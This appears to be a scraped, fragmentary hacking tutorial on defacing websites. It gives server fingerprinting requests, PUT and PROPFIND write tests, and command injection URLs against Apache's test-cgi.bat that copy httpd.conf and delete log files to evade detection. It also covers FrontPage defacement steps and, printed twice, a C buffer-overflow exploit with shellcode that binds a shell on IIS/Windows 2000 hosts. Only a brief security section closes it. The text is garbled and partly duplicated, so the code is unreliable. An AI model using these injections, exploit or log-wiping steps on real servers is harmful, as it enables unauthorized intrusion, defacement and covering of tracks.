Documente Academic
Documente Profesional
Documente Cultură
___________________________________________
Defacing wbsites
_____________________________________________________________________________________
____________________________________________
Defacing Websites
www.packetstormsecurity.com
These sites even offer the exploit code and the method of
exploitation.
You can also discover new vulnerabilities in web servers and sites
through web security scanner.
Tools of Trade
GET \ HTTP/1.1\r\n\r\n
Host:server-software
<enter>
<enter>
<enter>
Connection: close
<HTML><HEAD>
<TITLE>403 Forbidd
en</TITLE>
</HEAD><BODY>
<H1>Forbidden</H1>
on
this server.<P>
<HR>
RESS>
</BODY></HTML>
Okay, I hope you have figured out, what I mean. It is mere telnet
response. Okay, I will tell you what to do; you have to telnet a web
server or website into port 80.
NOTE: I have telnetted the domain name; you can telnet the IP
address also.
So, after telnetting the web server name or the website \, you will
get a blank screen. So, in the blank screen, type in some requests
like GET \ HTTP/1.1\r\n\r\n then type something like
Host:server-software then press <enter> quite a few times until
you get the server’s response. The server will respond with its
software information
READ ACCESS
Whenever you visit a website through your web browser, you type
in the domain name. Do you know what happens, when you type in
the domain name? Actually, when you type in the domain name
and press enter, you are connected to port 80 (HTTP port) of the
IP address linked with the domain name.
For Example
WRITE ACCESS
Well, this was technique was employed and executed years ago.
Soon, computer enthusiaists realized that this kind of technique
was a huge security threat. So, they developed new techniques to
subdue the security threat. Nowadays, web servers are designed
and configured as such to give write access to only selected virtual
directories.
TIP: Try telnetting a web server and find out some good
information about the server and its behavior.
Connected to www.hackingtheworld.ilitehost.com.......
Connected to www.hackingtheworld.ilitehost.com......
Connected to www.hackingtheworld.ilitehost.com......
Connected to www.hackingtheworld.ilitehost.com......
Connected to www.hackingtheworld.ilitehost.com.....
PROPFIND / HTTP/1.1
Host:iis-server
Content-Length:0
Well, you must be wondering how you can test write access
permission for a particular directory in IIS server.
Host: iis-server
Content-Length: 10 <enter><enter>
Once you make the following request, the server should respond
with a 100 Continue Message.
Server: Microsoft-IIS/5.0
XXXXXXXXXX
Server: Microsoft-IIS/5.0
Location: http://iis-server/dir/my_file.txt
Content-Length: 0
If the server responds with this 201 Created response then the
write permission is enabled.
EXECUTION ACCESS
Server side pages like ASP, PHP, JSP or DLL are used in highly
advanced database driven dynamic websites, which dynamically
generates the HTML and sends it to the client (web browser).
These server side pages and other executables including DLL and
EXE files needs execution perquisites in the virtual directory
where they are kept.
NOTE: DLL, EXE etc need execution perquisites, they are kept in a
single virtual directory.
DIRECTORY SURFING
Well, if you are not familiar with apache, then let me give you a
brief description. Apache is a server, in which you have to
configure your web server using command and scripts. These
scripts and commands are kept in httpd.conf file in c:\apache
group\apache\conf folder default Apache installation on a
distinctive windows system. This file contains all the settings of
the web server and if we get our hands into this file, then we get
to know all the settings of the web server, including the location of
log files, directory permissions, write access, authentication levels
etc.
So, now let’s get on with the exploit. As we know that Apache is
the most preferred web server. This web server has a .bat in its
cgi-bin directory. This .bat file is named as test-cgi.bat. Actually,
the motive of the .bat file is to test the privileges of cgi-bin
directory.
NOTE: cgi-bin directory contains all the CGI and Perl scripts.
NOTE: If you don’t know how to put the | (pipe) character, then
don’t worry. To put the pipe character press Alt+ \, the \
character is just beside your backspace key.
http://www.target.com/cgi-bin/test-cgi.bat?|copy+..\conf\httpd.
conf+..\htdocs\httpd.conf
Through the above URL, I have copied the httpd.conf file from the
conf directory. The conf directory mostly, does not have read
access to the Apache web root, that is, htdocs virtual folder. Now,
we can easily download the httpd.conf file using the following
URL:
http://target.com/httpd.conf
http://www.securityfocus.com
http://www.packetstorm.org
http://www.guininski.com
http://www.insecure.org
http://www.securiteam.com
http://www.slashdot.org
http://www.technotronic.com
Well, I must say, this is the most exciting part of this tutorial.
Okay, so, www.victim.com is the target site. Well, through the
above methods, I mean the methods I have explained earlier in
the tutorial, through those methods, we have found out that the
website is functioning in Microsoft IIS server software. So, it is
time to find some vulnerability, I am using Acutenix Web Security
Scanner to scan for vulnerabilities. You guys must know
programming languages like Perl or Socket Programming or C, this
is essential because through this you will be able to compile the
exploits. So, once you get vulnerability, try exploiting it by
executing it in your client (browser).
You will get a blank screen, type GET and continue pressing
enter, till the web server responds to your requests.
GET <ENTER><ENTER>
http://www.victimserver.com/main.asp
http://www.victimserver.com/index.html
http://www.victimserver.com/index.htm
http://www.victimserver.com/index.asp
http://www.victimserver.com/main.htm
http://www.victimserver.com/main.htm
http://www.victimserver.com/default.htm
http://www.victimserver.com/default.asp
http://www.victimserver.com/default.html
Now, open Web Publishing Wizard, and follow the steps given
below.
- Now, browse the file that you are going to upload. Here,
index.html is the file, which we are going to upload.
- Now, you get a screen, where you have to name the web server.
Type in anything and click on Advanced.
- Select the service provider from the drop down box. This is
nothing but the kind of uploading it is going to do. Since, your
motive is to deface the site, select the "FrontPage Extended Web"
option since, this method of defacing works only for FrontPage
enabled sites.
- Type the URL of the victim server homepage and in the given
box, here it is www.victim.com/index.html .
- Here specify the URL that you type in the Web browser to access
the victim server website.
- Select the connection method that you use to access the internet.
keji@chinansl.com
use MS VC++ to compile this piece of code
*/
#include "stdafx.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
if(argc != 4)
return 0;
DWORD srcdata=0x01e2fb1c-4;//0x00457474;
//address of SHELLCODE
char* destIP=argv[1];
char* destFile=argv[3];
int webport=atoi(argv[2]);
SOCKET s;
long result=0;
if(WSAStartup(0x0101,&ws) != 0)
puts("WSAStartup() error");
return -1;
addr.sin_family=AF_INET;
addr.sin_port=htons(webport);
addr.sin_addr.s_addr=inet_addr(destIP);
s=socket(AF_INET,SOCK_STREAM,0);
if(s==-1)
return -1;
return -1;
char buff[4096];
char*
shellcode="\x55\x8b\xec\x33\xc0\xb0\xf0\xf7\xd8\x03\xe0\x8b\xfc\x33\xc9\x8
9"
"\x8d\x2c\xff\xff\xff\xb8\x6b\x65\x72\x6e\xab\xb8\x65\x6c\x33\x32"
"\xab\x32\xc0\xaa\xb8\x77\x73\x6f\x63\xab\xb8\x6b\x33\x32\x2e\xab"
"\x4f\x32\xc0\xaa\x8d\x7d\x80\xb8\x63\x6d\x64\x2e\xab\x32\xc0\x4f"
"\xaa\xb8\x23\x80\xe7\x77\x8d\x9d\x10\xff\xff\xff\x53\xff\xd0\x89"
"\x45\xfc\xb8\x23\x80\xe7\x77\x8d\x9d\x19\xff\xff\xff\x53\xff\xd0"
"\x89\x45\xf8\xbb\x4b\x56\xe7\x77\x6a\x47\xff\x75\xfc\xff\xd3\x89"
"\x45\xf4\x6a\x48\xff\x75\xfc\xff\xd3\x89\x45\xf0\x33\xf6\x66\xbe"
"\x1d\x02\x56\xff\x75\xfc\xff\xd3\x89\x45\xec\x66\xbe\x3e\x02\x56"
"\xff\x75\xfc\xff\xd3\x89\x45\xe8\x66\xbe\x0f\x03\x56\xff\x75\xfc"
"\xff\xd3\x89\x45\xe4\x66\xbe\x9d\x01\x56\xff\x75\xfc\xff\xd3\x89"
"\x85\x34\xff\xff\xff\x66\xbe\xc4\x02\x56\xff\x75\xfc\xff\xd3\x89"
"\x85\x28\xff\xff\xff\x33\xc0\xb0\x8d\x50\xff\x75\xfc\xff\xd3\x89"
"\x85\x18\xff\xff\xff\x6a\x73\xff\x75\xf8\xff\xd3\x89\x45\xe0\x6a"
"\x17\xff\x75\xf8\xff\xd3\x89\x45\xdc\x6a\x02\xff\x75\xf8\xff\xd3"
"\x89\x45\xd8\x33\xc0\xb0\x0e\x48\x50\xff\x75\xf8\xff\xd3\x89\x45"
"\xd4\x6a\x01\xff\x75\xf8\xff\xd3\x89\x45\xd0\x6a\x13\xff\x75\xf8"
"\xff\xd3\x89\x45\xcc\x6a\x10\xff\x75\xf8\xff\xd3\x89\x45\xc8\x6a"
"\x03\xff\x75\xf8\xff\xd3\x89\x85\x1c\xff\xff\xff\x8d\x7d\xa0\x32"
"\xe4\xb0\x02\x66\xab\x66\xb8\x04\x57\x66\xab\x33\xc0\xab\xf7\xd0"
"\xab\xab\x8d\x7d\x8c\x33\xc0\xb0\x0e\xfe\xc8\xfe\xc8\xab\x33\xc0"
"\xab\x40\xab\x8d\x45\xb0\x50\x33\xc0\x66\xb8\x01\x01\x50\xff\x55"
"\xe0\x33\xc0\x50\x6a\x01\x6a\x02\xff\x55\xdc\x89\x45\xc4\x6a\x10"
"\x8d\x45\xa0\x50\xff\x75\xc4\xff\x55\xd8\x6a\x01\xff\x75\xc4\xff"
"\x55\xd4\x33\xc0\x50\x50\xff\x75\xc4\xff\x55\xd0\x89\x45\xc0\x33"
"\xff\x57\x8d\x45\x8c\x50\x8d\x45\x98\x50\x8d\x45\x9c\x50\xff\x55"
"\xf4\x33\xff\x57\x8d\x45\x8c\x50\x8d\x45\x90\x50\x8d\x45\x94\x50"
"\xff\x55\xf4\xfc\x8d\xbd\x38\xff\xff\xff\x33\xc9\xb1\x44\x32\xc0"
"\xf3\xaa\x8d\xbd\x38\xff\xff\xff\x33\xc0\x66\xb8\x01\x01\x89\x47"
"\x2c\x8b\x45\x94\x89\x47\x38\x8b\x45\x98\x89\x47\x40\x89\x47\x3c"
"\xb8\xf0\xff\xff\xff\x33\xdb\x03\xe0\x8b\xc4\x50\x8d\x85\x38\xff"
"\xff\xff\x50\x53\x53\x53\x6a\x01\x53\x53\x8d\x4d\x80\x51\x53\xff"
"\x55\xf0\x33\xc0\xb4\x04\x50\x6a\x40\xff\x95\x34\xff\xff\xff\x89"
"\x85\x30\xff\xff\xff\x90\x33\xdb\x53\x8d\x85\x2c\xff\xff\xff\x50"
"\x53\x53\x53\xff\x75\x9c\xff\x55\xec\x8b\x85\x2c\xff\xff\xff\x85"
"\xc0\x74\x49\x33\xdb\x53\xb7\x04\x8d\x85\x2c\xff\xff\xff\x50\x53"
"\xff\xb5\x30\xff\xff\xff\xff\x75\x9c\xff\x55\xe8\x85\xc0\x74\x6d"
"\x33\xc0\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff\xff\xff"
"\x75\xc0\xff\x55\xcc\x83\xf8\xff\x74\x53\xeb\x10\x90\x90\x90\x90"
"\x90\x90\x6a\x32\xff\x95\x28\xff\xff\xff\xeb\x99\x90\x90\x33\xc0"
"\x50\xb4\x04\x50\xff\xb5\x30\xff\xff\xff\xff\x75\xc0\xff\x55\xc8"
"\x83\xf8\xff\x74\x28\x89\x85\x2c\xff\xff\xff\x33\xc0\x50\x8d\x85"
"\x2c\xff\xff\xff\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff"
"\xff\xff\x75\x90\xff\x55\xe4\x85\xc0\x74\x02\xeb\xb4\xff\x75\xc4"
"\xff\x95\x1c\xff\xff\xff\xff\x75\xc0\xff\x95\x1c\xff\xff\xff\x6a"
"\xff\xff\x95\x18\xff\xff\xff";
form-urlencoded\r\n";
char* s5="Transfer-Encoding:
chunked\r\n\r\n";
char* sc="0\r\n\r\n\r\n";
char shellcodebuff[1024*8];
memset(shellcodebuff,0x90,sizeof
(shellcodebuff));
memcpy(&shellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1],shellcode,strlen(shellcode));
shellcodebuff[sizeof(shellcodebuff)-1] = 0;
char sendbuff[1024*16];
memset(sendbuff,0,1024*16);
sprintf(sendbuff,"%s%s?%s HTTP/1.1\r\n%sHost:
%s\r\n%s%s10\r\n%s\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n%s", s1, destFile,
shellcodebuff, s2, destIP, s4,s 5, pad/*,srcdata,jmpaddr*/, sc);
int sendlen=strlen(sendbuff);
result=send(s,sendbuff,sendlen,0);
if(result == -1 )
return -1;
memset(buff,0,4096);
result=recv(s,buff,sizeof(buff),0);
if(strstr(buff,"<html>") != NULL)
shutdown(s,0);
closesocket(s);
return -1;
}
shutdown(s,0);
closesocket(s);
puts("If you cannot connect to the host,try run this program again!");
return 0;
Well, I think its better that you code your own exploit code, in Perl
or C, in order to break into websites.
TIP: If you do not want to get busted, you must clear the log files
after you break into a web server.
CLEARING LOGS
You must clear you’re the logs, in order to save yourself from
getting busted. So, you can use cross site scripting vulnerability,
to clear the log files. You can do by executing the following URL:
http://www.target.com/cgi-bin/test-cgi.bat?|/DEL+..\log\*.*
In case of IIS on Windows 2000 you can use the following method
to get a DOS Shell through telnet.
keji@chinansl.com
*/
#include "stdafx.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
if(argc != 4)
return 0;
DWORD srcdata=0x01e2fb1c-4;//0x00457474;
//address of SHELLCODE
char* destIP=argv[1];
char* destFile=argv[3];
int webport=atoi(argv[2]);
WSADATA ws;
SOCKET s;
long result=0;
if(WSAStartup(0x0101,&ws) != 0)
puts("WSAStartup() error");
return -1;
addr.sin_family=AF_INET;
addr.sin_port=htons(webport);
addr.sin_addr.s_addr=inet_addr(destIP);
s=socket(AF_INET,SOCK_STREAM,0);
if(s==-1)
return -1;
return -1;
char buff[4096];
char*
shellcode="\x55\x8b\xec\x33\xc0\xb0\xf0\xf7\xd8\x03\xe0\x8b\xfc\x33\xc9\x8
9"
"\x8d\x2c\xff\xff\xff\xb8\x6b\x65\x72\x6e\xab\xb8\x65\x6c\x33\x32"
"\xab\x32\xc0\xaa\xb8\x77\x73\x6f\x63\xab\xb8\x6b\x33\x32\x2e\xab"
"\x4f\x32\xc0\xaa\x8d\x7d\x80\xb8\x63\x6d\x64\x2e\xab\x32\xc0\x4f"
"\xaa\xb8\x23\x80\xe7\x77\x8d\x9d\x10\xff\xff\xff\x53\xff\xd0\x89"
"\x45\xfc\xb8\x23\x80\xe7\x77\x8d\x9d\x19\xff\xff\xff\x53\xff\xd0"
"\x89\x45\xf8\xbb\x4b\x56\xe7\x77\x6a\x47\xff\x75\xfc\xff\xd3\x89"
"\x45\xf4\x6a\x48\xff\x75\xfc\xff\xd3\x89\x45\xf0\x33\xf6\x66\xbe"
"\x1d\x02\x56\xff\x75\xfc\xff\xd3\x89\x45\xec\x66\xbe\x3e\x02\x56"
"\xff\x75\xfc\xff\xd3\x89\x45\xe8\x66\xbe\x0f\x03\x56\xff\x75\xfc"
"\xff\xd3\x89\x45\xe4\x66\xbe\x9d\x01\x56\xff\x75\xfc\xff\xd3\x89"
"\x85\x34\xff\xff\xff\x66\xbe\xc4\x02\x56\xff\x75\xfc\xff\xd3\x89"
"\x85\x28\xff\xff\xff\x33\xc0\xb0\x8d\x50\xff\x75\xfc\xff\xd3\x89"
"\x85\x18\xff\xff\xff\x6a\x73\xff\x75\xf8\xff\xd3\x89\x45\xe0\x6a"
"\x17\xff\x75\xf8\xff\xd3\x89\x45\xdc\x6a\x02\xff\x75\xf8\xff\xd3"
"\x89\x45\xd8\x33\xc0\xb0\x0e\x48\x50\xff\x75\xf8\xff\xd3\x89\x45"
"\xd4\x6a\x01\xff\x75\xf8\xff\xd3\x89\x45\xd0\x6a\x13\xff\x75\xf8"
"\xff\xd3\x89\x45\xcc\x6a\x10\xff\x75\xf8\xff\xd3\x89\x45\xc8\x6a"
"\x03\xff\x75\xf8\xff\xd3\x89\x85\x1c\xff\xff\xff\x8d\x7d\xa0\x32"
"\xe4\xb0\x02\x66\xab\x66\xb8\x04\x57\x66\xab\x33\xc0\xab\xf7\xd0"
"\xab\xab\x8d\x7d\x8c\x33\xc0\xb0\x0e\xfe\xc8\xfe\xc8\xab\x33\xc0"
"\xab\x40\xab\x8d\x45\xb0\x50\x33\xc0\x66\xb8\x01\x01\x50\xff\x55"
"\xe0\x33\xc0\x50\x6a\x01\x6a\x02\xff\x55\xdc\x89\x45\xc4\x6a\x10"
"\x8d\x45\xa0\x50\xff\x75\xc4\xff\x55\xd8\x6a\x01\xff\x75\xc4\xff"
"\x55\xd4\x33\xc0\x50\x50\xff\x75\xc4\xff\x55\xd0\x89\x45\xc0\x33"
"\xff\x57\x8d\x45\x8c\x50\x8d\x45\x98\x50\x8d\x45\x9c\x50\xff\x55"
"\xf4\x33\xff\x57\x8d\x45\x8c\x50\x8d\x45\x90\x50\x8d\x45\x94\x50"
"\xff\x55\xf4\xfc\x8d\xbd\x38\xff\xff\xff\x33\xc9\xb1\x44\x32\xc0"
"\xf3\xaa\x8d\xbd\x38\xff\xff\xff\x33\xc0\x66\xb8\x01\x01\x89\x47"
"\x2c\x8b\x45\x94\x89\x47\x38\x8b\x45\x98\x89\x47\x40\x89\x47\x3c"
"\xb8\xf0\xff\xff\xff\x33\xdb\x03\xe0\x8b\xc4\x50\x8d\x85\x38\xff"
"\xff\xff\x50\x53\x53\x53\x6a\x01\x53\x53\x8d\x4d\x80\x51\x53\xff"
"\x55\xf0\x33\xc0\xb4\x04\x50\x6a\x40\xff\x95\x34\xff\xff\xff\x89"
"\x85\x30\xff\xff\xff\x90\x33\xdb\x53\x8d\x85\x2c\xff\xff\xff\x50"
"\x53\x53\x53\xff\x75\x9c\xff\x55\xec\x8b\x85\x2c\xff\xff\xff\x85"
"\xc0\x74\x49\x33\xdb\x53\xb7\x04\x8d\x85\x2c\xff\xff\xff\x50\x53"
"\xff\xb5\x30\xff\xff\xff\xff\x75\x9c\xff\x55\xe8\x85\xc0\x74\x6d"
"\x33\xc0\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff\xff\xff"
"\x75\xc0\xff\x55\xcc\x83\xf8\xff\x74\x53\xeb\x10\x90\x90\x90\x90"
"\x90\x90\x6a\x32\xff\x95\x28\xff\xff\xff\xeb\x99\x90\x90\x33\xc0"
"\x50\xb4\x04\x50\xff\xb5\x30\xff\xff\xff\xff\x75\xc0\xff\x55\xc8"
"\x83\xf8\xff\x74\x28\x89\x85\x2c\xff\xff\xff\x33\xc0\x50\x8d\x85"
"\x2c\xff\xff\xff\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff"
"\xff\xff\x75\x90\xff\x55\xe4\x85\xc0\x74\x02\xeb\xb4\xff\x75\xc4"
"\xff\x95\x1c\xff\xff\xff\xff\x75\xc0\xff\x95\x1c\xff\xff\xff\x6a"
"\xff\xff\x95\x18\xff\xff\xff";
form-urlencoded\r\n";
char* s5="Transfer-Encoding:
chunked\r\n\r\n";
char* sc="0\r\n\r\n\r\n";
char shellcodebuff[1024*8];
memset(shellcodebuff,0x90,sizeof
(shellcodebuff));
memcpy(&shellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1],shellcode,strlen(shellcode));
shellcodebuff[sizeof(shellcodebuff)-1] = 0;
char sendbuff[1024*16];
memset(sendbuff,0,1024*16);
sprintf(sendbuff,"%s%s?%s HTTP/1.1\r\n%sHost:
%s\r\n%s%s10\r\n%s\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n%s", s1, destFile,
shellcodebuff, s2, destIP, s4,s 5, pad/*,srcdata,jmpaddr*/, sc);
int sendlen=strlen(sendbuff);
result=send(s,sendbuff,sendlen,0);
if(result == -1 )
return -1;
memset(buff,0,4096);
result=recv(s,buff,sizeof(buff),0);
if(strstr(buff,"<html>") != NULL)
shutdown(s,0);
closesocket(s);
puts("Send shellcode error!Try again!");
return -1;
shutdown(s,0);
closesocket(s);
puts("If you cannot connect to the host,try run this program again!");
return 0;
To implement the C code, you must compile it and run. Now, you
must be wondering, what is the use of this code? Actually, the C
code causes an overflow in IIS on Windows 2000 and commands
the system to bind a shell to the source Ip on port 1111. So, once
the exploit works, there will be a shell bind on port 1111 on the
target system. To workout, you must telnet the target IP into port
1111, through this you will be connected to the system without
any kind of authentication.
Various Security Measures
Website defacement has become a terrible problem for IT
(Information Technology) based companies. Everyday thousands
of websites are defaced. Well, even Government websites are
defaced for different reasons; the most common reason is cyber
war. Like in reality, there are wars between two rival countries,
similarly, in wired world, there are cyber wars.
If you want to see the web attack archive, visit the following site:
http://defaced.alldas.org
- First of all, you must coordinate and organize your web root,
with suitable directories. What I mean to say is that, you must
organize your files, like images in an image directory, one for
server side contents and so on so forth. If you don’t configure your
web root properly then your web server will be prone to many
attacks.
http://www.packetstorm.org
http://www.guininski.com
http://www.insecure.org
http://www.securiteam.com
http://www.slashdot.org
http://www.technotronic.com
Well, every web server is vulnerable, but you must not fear, you
must download the latest patches for the particular vulnerability.
Well, the last thing is that you must be able to predict the moves
of a malicious cracker or a script kiddie. You need to know how a
cracker breaks into your site or web server, you need to know the
motive behind the attack and you must think, act and work like a
hacker and take the cracker out from the root.